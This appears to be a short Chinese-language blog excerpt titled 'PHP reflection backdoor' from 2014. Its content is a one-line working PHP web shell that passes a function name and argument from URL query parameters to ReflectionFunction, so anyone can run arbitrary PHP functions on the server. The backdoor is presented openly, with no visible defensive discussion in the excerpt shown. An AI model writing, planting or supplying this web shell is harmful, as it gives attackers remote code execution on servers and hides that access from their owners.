PHP反射后门 Nov 07,2014 in Web,安全研究 read (4531) <?php $func = new ReflectionFunction($_GET[m]); echo $func->invokeArgs(array($_GET[c]));?> 继续阅读